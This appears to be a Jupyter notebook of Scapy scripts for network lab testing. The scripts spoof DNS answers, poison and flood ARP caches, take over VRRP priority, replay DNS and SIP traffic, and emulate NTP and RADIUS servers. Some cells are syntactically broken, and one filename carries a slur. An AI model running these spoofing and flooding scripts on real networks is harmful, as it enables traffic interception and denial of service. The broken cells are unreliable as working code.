### DNS

In [ ]:
## DNS server emulation with customized dns response

from scapy.all import *

def structandsend(pkt):
    resp=Ether(src=pkt[Ether].dst, dst=pkt[Ether].src)/IP(src=pkt[IP].dst, dst=pkt[IP].src)/UDP(sport=53, dport=pkt[UDP].sport)/DNS(id=pkt[DNS].id,ancount=1,an=DNSRR(rrname=pkt[DNSQR].qname,rdata='3.3.3.3'))
    sendp(resp, iface='eth0')
    print 'packet sent\n'
def dns_monitor_callback(packet):
    if (packet.haslayer(DNS) and packet[IP].src=='5.5.4.3'):
        structandsend(packet)

sniff(prn=dns_monitor_callback, store=0)

In [ ]:
# more examples of constructing dns response
def structandsend(pkt):
    a=rdpcap("/root/Scripts/pythonsockets/dnsres.pcap")
    resp=a[0]
    del resp[UDP].chksum
    del resp[IP].chksum
    resp[Ether].src=pkt[Ether].dst
    resp[Ether].dst=pkt[Ether].src
    resp[IP].src=pkt[IP].dst
    resp[IP].dst=pkt[IP].src
    resp[UDP].sport=53
    resp[UDP].dport=pkt[UDP].sport
    resp[DNS].id=pkt[DNS].id
    resp[DNS]=DNSRR(rrname=pkt[DNSQR].qname,rdata='192.118.1.2')
    an=None, ns=(DNSRR(rrname=pkt[DNS].qd.qname, type='NS', ttl=3600, rdata='ns1.%s.com' % (id_generator()))/
    resp=Ether(src=pkt[Ether].dst=dst=pkt[Ether].src)/IP(src=pkt[IP].dst, dst=pkt[IP].src)/UDP(sport=53, dport=pkt[UDP].sport)\
                 /DNS(id=pkt[DNS].id,ancount=1,qr=1,an=DNSRR(rrname=pkt[DNSQR].qname,rdata='192.118.1.2'))
    sendp(resp, iface ='eth0')

In [ ]:
################################################
# emulate DNS server responding with randomized IPs
################################################
import RandomIP
from scapy.all import *
import sys
import random
import time
inst=RandomIP.RandomIP()
e=Ether(src='84:2b:2b:fb:0c:11',dst='00:0c:29:00:96:35')
ip=IP(src='10.107.246.199',dst='10.107.246.177')

def server_callback(packet):

    if packet.haslayer(DNS) and packet[UDP].dport==53:

        udp=UDP(sport=53, dport=packet[UDP].sport)
        dnsresponse=DNS(id=packet[DNS].id,qd=packet[DNS].qd,ancount=3,nscount=1,arcount=1,qr=1,rd=1,ra=1,\
                        an=DNSRR(rrname=packet[DNS].qd.qname, ttl=10,rdata='11.107.246.11')\
                        /DNSRR(rrname=packet[DNS].qd.qname, ttl=10,rdata='11.107.246.12')
                        /DNSRR(rrname=packet[DNS].qd.qname,rdata=inst.randIPrange('11.107.246.13','11.107.246.250'),ttl=10)\
                        /DNSRR(rrname=packet[DNS].qd.qname,type='NS', ttl=10,rdata='ns1.example2.com')\
                        /DNSRR(rrname='ns1.example2.com', ttl=10,rdata='192.155.22.2'))
        print 'sending...\n'
        sendp(e/ip/udp/dnsresponse,iface='eth0')



sniff(prn=server_callback, filter =" udp port 53 and host 10.107.246.177",iface='eth0', store=0)

In [ ]:
#################################
# replay dns traffic from pcap
##################################

import multiprocessing as mp
from scapy.all import *
import subprocess
import sys
import random
import time
from scapy.utils import PcapWriter
from collections import OrderedDict
listo=[]


cap=rdpcap('/home/ftp/capturefiles/caplab.pcap')
cap2=rdpcap('/home/ftp/capturefiles/possiblereplay.pcap')

pkt1=cap[0]

pkt2=cap2[0]
print pkt2.show()
pkt1[UDP]=pkt2[UDP]
del pkt1[IP].chksum
del pkt1[UDP].chksum
del pkt1[IP].len
del pkt1[UDP].len

for i in cap:
    del i[IP].chksum
    del i[UDP].chksum
    del i[IP].len
    del i[UDP].len

    i[DNSQR].qname=""
    i[DNSQR].qtype=255

    
    listo.append(i)

print pkt1.show()
sendp(pkt1,iface='eth0')


### HTTP client/server with fragmented traffic

In [ ]:
#client
from scapy.all import *
import time

def sanitize(dirty):
    san_first=dirty.encode('hex')
    san_first=str(san_first)
    san_sec=san_first.replace('5c725c6e', '0d0a')
    san_third=san_sec.decode('hex')
    return san_third

dip='98.88.88.88'
dip2='10.248.2.2'
e=Ether(src='00:03:b2:53:8f:00', dst='2c:b6:93:16:77:00')
ip=IP(src='192.168.0.10',dst=dip,id=12345)
tcp=TCP(sport=8909,dport=80, flags='S', seq=67263475)
syn=e/ip/tcp
sendp(syn, iface='eth0')
time.sleep(0.2)
seqn=67263475 +1
ackn=11222322
ACK=e/ip/TCP(sport=8909,dport=80,flags='A', ack=ackn, seq=seqn)
sendp(ACK, iface='eth0')
request='GET / HTTP/1.1\r\nHost: 10.105.5.75\r\nConnection: keep-alive\r\nUser-Agent: Jakarta Commons-HttpClient/3.0.1\r\n\r\n'
payload=sanitize(request)
packet=e/ip/TCP(sport=8909,dport=80, flags='PA', seq=seqn, ack=ackn)/payload
frags=fragment(packet,fragsize=70)
counter=1
for fragment in frags:
  print "Packet no#"+str(counter)
  print "==================================================="
#  fragment.show() #displays each fragment
  counter+=1
  sendp(fragment, iface='eth0')



In [ ]:
#server
from scapy.all import *
import time

def sanitize(dirty):
    san_first=dirty.encode('hex')
    san_first=str(san_first)
    san_sec=san_first.replace('5c725c6e', '0d0a')
    san_third=san_sec.decode('hex')
    return san_third


def server_callback(packet):
    if packet[TCP].sport==8909 and packet[TCP].dport==90:
        sip='98.88.88.88'
        sip2='10.248.2.2'
        dip ='192.168.0.10'
        e=Ether(src='00:00:0C:07:AC:79', dst='00:00:5e:00:01:bf')
        ip=IP(src=sip,dst=dip,id=11345)
        seqn=11222321
        ackn=67263476
        tcp=TCP(sport=80,dport=8909, flags='SA', seq=seqn, ack=ackn)
        synack=e/ip/tcp
        sendp(synack, iface='eth3')
        time.sleep(0.7)
        seqn=seqn+1
        resp='HTTP/1.1 200 OK\r\nServer: openresty/1.7.10.1\r\nDate: Mon, 17 Oct 2016 23:04:29 GMT\r\nContent-Type: text/css\r\nContent-Length: 210\r\nConnection: keep-alive\r\nLast-Modified: Mon, 06 Jun 2016 21:42:15 GMT\r\nETag: "1f8d629-254-534a2f221210b"\r\nAccept-Ranges: bytes\r\n\r\narnabchatterjeearnabchatterjeearnabchatterjeearnabchatterjeearnabchatterjeearnabchatterjeearnabchatterjeearnabchatterjeearnabchatterjeearnabchatterjeearnabchatterjeearnabchatterjeearnabchatterjeearnabchatterjee'
        payload=sanitize(request)
        packet=e/ip/TCP(sport=80,dport=8909, flags='PA', seq=seqn, ack=67679679)/payload
        frags=fragment(packet,fragsize=70)
        counter=1
        for fragment in frags:
          print "Packet no#"+str(counter)
          print "==================================================="
        #  fragment.show() #displays each fragment
          counter+=1
          sendp(fragment, iface='eth3')
    else:
        pass


sniff(prn=server_callback, filter =" tcp port 8909", store=0)

## Modify packet attributes in pcap file

In [ ]:

import random
from scapy.all import *
from scapy.utils import PcapWriter
a=rdpcap('/home/ftp/shariqueis.pcap')
pktdump = PcapWriter("/home/ftp/shariqueisgay2.pcap", append=True, sync=True)

for i in a:
    i[IP].dst= '207.69.188.185'
    del i[IP].chksum
    pktdump.write(i)
    


## VRRP emulator

In [ ]:

import random
import time
from scapy.all import *
from scapy.utils import PcapWriter
a=rdpcap('/home/ftp/vrrppacket.pcap')
for i in a:
    i[IP].src='10.105.6.88'
    del i[IP].chksum
    i[VRRP].priority=101
    del i[VRRP].chksum
while True:
    sendp(a[0], iface='eth2')
    sendp(a[1], iface='eth2')
    time.sleep(1)

## ARP

In [ ]:
##################### 
#arp and garp flood
#####################

from scapy.all import *
import random
import RandomIP
oj=RandomIP.RandomIP()

arpreqls=[]

for _ in xrange(1000):
    arpreqls.append(Ether(src='84:2b:2b:fb:0c:11',dst='2c:b6:93:63:14:00')/ARP(op=1,hwsrc='84:2b:2b:fb:0c:11',pdst=oj.randIPsubnet(subnet='192.168.101.0', mask=16),psrc='192.168.101.1',hwdst='00:00:00:00:00:00'))

sendp(arpreqls, iface='eth0')

# we want this to fill up mp arp cache, also can be arp traffic to be blocked
arprespls=[]
for _ in xrange(8000):
    arprespls.append(Ether(src='84:2b:2b:fb:0c:11',dst='2c:b6:93:63:14:00')/ARP(op=2,hwsrc='84:2b:2b:fb:0c:11',psrc=oj.randIPsubnet(subnet='192.168.101.0', mask=16),hwdst='2c:b6:93:63:14:00',pdst='192.168.101.207'))

sendp(arprespls, iface='eth0')

In [ ]:
####################
# arp poison
###################

from scapy.all import *
import sys
import random
import time


def arp_monitor_callback(packet):
    if ARP in packet and packet[ARP].op in (1):
        if packet[ARP].psrc=='192.168.250.2' and packet[ARP].hwdst=='00:00:00:00:00:00':
            e=Ether(src='84:2b:2b:fb:0c:11', dst='2c:b6:93:56:18:80')
            a=ARP(op=2,psrc=packet[ARP].pdst,pdst='192.168.250.2',hwdst='2c:b6:93:56:18:80',hwsrc='94:2c:2b:fb:0c:12')
            pkt=e/a
            pkt.show()
            sendp(pkt,iface='eth1')
            print 'packet sent'
            
            
        
sniff(prn=arp_monitor_callback,filter =" arp",iface='eth0', store=0)

## SIP

In [ ]:
#########
#SIP client
##########


from scapy.all import *
import sys
import random
sipreqread=rdpcap('/home/ftp/capturefiles/labsip.pcap')
first=sipreqread[0]
second=sipreqread[1]
del first[UDP].chksum
del second[UDP].chksum

pkt1=Ether(src='84:2B:2B:FB:0C:11', dst='00:0C:29:FA:3D:C8')/IP(src='10.107.246.199', dst='10.107.246.193')
pkt2=Ether(src='84:2B:2B:FB:0C:11', dst='00:0C:29:FA:3D:C8')/IP(src='10.107.246.199', dst='10.107.246.192')
second[Raw].load='INVITE sip:95134@10.106.21.192:5060 SIP/2.0\r\nFrom: "92499" <sip:92499@10.106.21.154:5060>;tag=32C196DC-C5A4-4B27-A212-D77CBC078C5A-739928\r\nTo: <sip:95134@10.106.21.154:5060>\r\nCall-ID: 52DD6E74-9E1D-44DB-BFA0-E7E6328C833F-620884@10.106.21.154\r\nCSeq: 1 INVITE\r\nContent-Length: 0\r\nVia: SIP/2.0/UDP 10.106.21.154:5060;branch=z9hG4bK219764DA-D89E-4CC2-AF13-7CC386388757-4899601\r\nContact: <sip:92499@10.106.21.154:5060>\r\nAllow: ACK, BYE, CANCEL, INFO, INVITE, MESSAGE, NOTIFY, OPTIONS, PRACK, REFER, UPDATE\r\nMax-Forwards: 70\r\nX-Genesys-geo-location: Production\r\nX-Genesys-CallUUID: 79C64ALCG12J99ND8T7P588ANG00423I\r\nX-ISCC-CofId: location=ANZ_Agent_SIP_DC1_Switch;cofid=17113588\r\nSession-Expires: 1800;refresher=uac\r\nMin-SE: 90\r\nSupported: uui,timer\r\nUser-Agent: Genesys SIP Server 8.1.103.85 (DC1_SIP_Agent_Prim)\r\n\r\n'

second[UDP].show()
req1=pkt1/first[UDP]
req2=pkt2/second[UDP]
sendp(req2,iface='eth0')


## NTP


In [ ]:
###################
#emulate NTP server
###################



from scapy.all import *
cappntp=rdpcap('/home/ftp/capturefiles/samplentpres.pcap')
ntprespraw=cappntp[0]
del ntprespraw[UDP].chksum
del ntprespraw[IP].chksum


ntprespraw[NTPHeader].ref=ntpref
ntprespraw[NTPHeader].orig=ntporig
ntprespraw[NTPHeader].recv=ntprecv
ntprespraw[NTPHeader].sent=ntprecv

ntprespraw[IP].dst='10.107.246.140'
ntprespraw[IP].src='10.107.246.199'
ntprespraw[Ether].src='84:2b:2b:fb:0c:11'
ntprespraw[Ether].dst='00:0C:29:82:5A:28'


def server_callback(packet):

    if packet.haslayer(NTP) and packet[UDP].dport==123:
        
        if packet[IP].dst=='10.107.246.199':

            print 'sending for 10.107.246.199...\n'
            sendp(ntprespraw,iface='eth0')
        
        elif packet[IP].dst=='10.107.246.198':
            ntprespraw[IP].src='10.107.246.198'

            print 'sending for 198...\n'
            sendp(ntprespraw,iface='eth0')
            


sniff(prn=server_callback, filter =" udp port 123 and host 10.107.246.140",iface='eth0', store=0)

In [ ]:
## Radius

In [ ]:
##########################
#Emulate radius server
##########################
from scapy.all import *
import random 
import hashlib
import struct
import binascii

cap=rdpcap("/home/ftp/capturefiles/aw_acceptreject.pcap")
pkt1=cap[0][Radius]

print pkt1.show()

packed_attrs = b''
for attr in pkt1.attributes:
    packed_attrs += raw(attr)


       
def radd(packet):
    if UDP in packet and packet[UDP].dport==1812:

        pkt1.id = packet[Radius].id
        
        packed_hdr = struct.pack("!B", pkt1.code)
        packed_hdr += struct.pack("!B", pkt1.id)
        packed_hdr += struct.pack("!H", pkt1.len)
        i=   str(binascii.hexlify(packed_hdr))+str(binascii.hexlify(packet[Radius].authenticator))+str(binascii.hexlify(packed_attrs))


#        auth_hmac= hashlib.md5(binascii.unhexlify(i)+"testing123").hexdigest()
        auth_hmac= hashlib.md5(binascii.unhexlify(i)+"testinn123").hexdigest() # on ourpose messing up the response authenticator
        auth_hmac=binascii.unhexlify(auth_hmac)


        pkt1.authenticator=auth_hmac
        e=Ether(src='84:2b:2b:fb:0c:11', dst='00:03:b2:c9:72:00')
        ip=IP(src=packet[IP].dst, dst=packet[IP].src)
        udp=UDP(sport=1812, dport=packet[UDP].sport)
        respp=e/ip/udp/pkt1
        

        sendp(respp,iface='eth0')
        respp.show()

            
            
        
sniff(prn=radd,filter =" host 10.107.251.180 and port 1812",iface='eth0', store=0)